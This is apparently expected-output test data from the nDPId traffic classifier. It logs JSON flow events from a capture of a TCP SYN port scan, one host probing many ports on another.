+00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":514,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":515,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6669,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6669,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":541,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":541,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":545,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":545,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 